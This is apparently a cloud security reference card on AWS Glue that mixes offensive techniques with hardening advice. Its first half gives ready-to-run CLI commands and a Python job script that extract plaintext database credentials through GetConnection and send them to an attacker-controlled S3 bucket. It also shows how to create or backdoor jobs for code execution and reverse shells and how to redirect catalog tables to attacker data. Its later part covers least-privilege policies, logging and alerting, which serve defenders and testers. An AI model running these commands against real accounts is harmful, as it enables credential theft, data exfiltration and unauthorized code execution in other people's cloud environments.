AWS Glue is a serverless data integration service for ETL jobs and data cataloging. Attackers exploit Glue to execute code via jobs, access sensitive data through crawlers, and leverage the Data Catalog to discover database schemas and connection credentials.
Glue jobs execute PySpark or Python shell scripts with powerful IAM roles. Jobs access S3 data, databases via JDBC connections, and the Data Catalog. Development endpoints provide interactive shell access with the job's IAM role.
Attack note: Creating a Glue job with a privileged IAM role gives arbitrary code execution with those permissions
The Data Catalog stores table schemas, S3 locations, and database metadata. Connections contain JDBC URLs, usernames, and passwords for RDS, Redshift, and external databases. Crawlers automatically discover and catalog data sources.
Attack note: GetConnection returns database credentials in plaintext - the #1 quick win in Glue exploitation
Glue jobs execute arbitrary code with powerful IAM roles. Connections contain database credentials. Data Catalog reveals schema information for entire data infrastructure. Development endpoints provide interactive shell access.
aws glue get-databasesaws glue get-tables --database-name mydbaws glue get-connectionsaws glue get-jobsaws glue get-dev-endpointsKey insight: iam:PassRole + glue:CreateJob = arbitrary code execution with any role. This is a known privesc path in Pacu and Rhino Security research.
aws glue get-connection \
--name my-rds-connection \
--query 'Connection.ConnectionProperties'aws glue create-job \
--name exfil-job \
--role arn:aws:iam::123456789012:role/GlueRole \
--command '{"name":"pythonshell",
"scriptLocation":"s3://attacker-bucket/exfil.py"}'aws glue start-job-run --job-name exfil-jobaws glue update-job --job-name legit-etl \
--job-update '{"Command":{"ScriptLocation":
"s3://attacker-bucket/backdoored-script.py"}}'aws glue get-tables --database-name mydb \
--query 'TableList[*].[Name,StorageDescriptor.Location]'aws glue get-job-runs --job-name my-etl-job \
--query 'JobRuns[*].[Id,JobRunState,ErrorMessage]'Glue jobs execute arbitrary code with the job's IAM role. Attackers can create or modify jobs for RCE:
# Create job with reverse shell
aws glue create-job \
--name backdoor-job \
--role arn:aws:iam::123456789012:role/GlueRole \
--command '{"name":"pythonshell","scriptLocation":"s3://attacker-bucket/shell.py"}'
# Run the job
aws glue start-job-run --job-name backdoor-job# Get connection with credentials
aws glue get-connection \
--name my-rds-connection
# Response includes:
{
"ConnectionProperties": {
"JDBC_CONNECTION_URL": "jdbc:mysql://...",
"USERNAME": "admin",
"PASSWORD": "SuperSecret123!"
}
}Glue connections store database credentials in plaintext. Attackers extract credentials via GetConnection API or inject malicious code into jobs that harvest credentials from the runtime environment.
# Malicious Python shell job that steals creds:
import boto3, json
glue = boto3.client('glue')
s3 = boto3.client('s3')
# Get all connections with passwords
conns = glue.get_connections()['ConnectionList']
creds = []
for c in conns:
props = c.get('ConnectionProperties', {})
creds.append({
'name': c['Name'],
'url': props.get('JDBC_CONNECTION_URL'),
'user': props.get('USERNAME'),
'pass': props.get('PASSWORD')
})
# Exfiltrate to attacker bucket
s3.put_object(Bucket='attacker-bucket',
Key='creds.json', Body=json.dumps(creds))# Redirect table to attacker-controlled S3
aws glue update-table --database-name mydb \
--table-input '{
"Name":"users",
"StorageDescriptor":{
"Location":"s3://attacker-bucket/fake-data/",
"InputFormat":"org.apache.hadoop.mapred.TextInputFormat",
"OutputFormat":"org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
"SerdeInfo":{"SerializationLibrary":"org.openx.data.jsonserde.JsonSerDe"},
"Columns":[{"Name":"user_id","Type":"string"}]
}
}'
# Now Athena queries against "users" table
# read data from attacker's bucket{
"Effect": "Allow",
"Action": "glue:*",
"Resource": "*"
}Full Glue access enables job creation, credential extraction, and RCE via job roles
{
"Effect": "Allow",
"Action": [
"glue:GetDatabase",
"glue:GetDatabases",
"glue:GetTable",
"glue:GetTables"
],
"Resource": [
"arn:aws:glue:*:*:catalog",
"arn:aws:glue:*:*:database/*",
"arn:aws:glue:*:*:table/*/*"
]
}Limited to viewing catalog metadata without job or connection access
{
"Effect": "Allow",
"Action": [
"glue:CreateJob",
"glue:StartJobRun",
"iam:PassRole"
],
"Resource": "*"
}PassRole + CreateJob = arbitrary code execution with any Glue-assumable role
{
"Effect": "Deny",
"Action": "glue:GetConnection",
"Resource": "*",
"Condition": {
"StringNotEquals": {
"aws:PrincipalTag/team": "data-engineering"
}
}
}Only data engineering team can retrieve connection credentials
Store credentials in Secrets Manager instead of Glue connections. Encrypt with KMS.
JDBC_ENFORCE_SSL=true in connection propertiesUse least privilege roles per job. Never share admin roles across jobs.
"Effect": "Allow",
"Action": "iam:PassRole",
"Resource": "arn:aws:iam::*:role/GlueJob-*",
"Condition": {"StringEquals": {
"iam:PassedToService": "glue.amazonaws.com"
}}Enable continuous CloudWatch logging for all Glue jobs for audit trail.
--enable-continuous-cloudwatch-log truePlace dev endpoints and jobs in private VPCs without direct internet access.
aws glue create-dev-endpoint \
--security-group-ids sg-xxx \
--subnet-id subnet-xxxEnable encryption at rest for the Data Catalog with customer-managed KMS key.
aws glue put-data-catalog-encryption-settings \
--data-catalog-encryption-settings '{
"EncryptionAtRest":{"CatalogEncryptionMode":"SSE-KMS",
"SseAwsKmsKeyId":"alias/glue-catalog"}}'Alert on CreateJob, UpdateJob, GetConnection, and unusual StartJobRun patterns.
EventBridge rule on glue.amazonaws.com events:
CreateJob, UpdateJob, GetConnection, CreateDevEndpointAWS Glue Security Card • Toc Consulting
Always obtain proper authorization before testing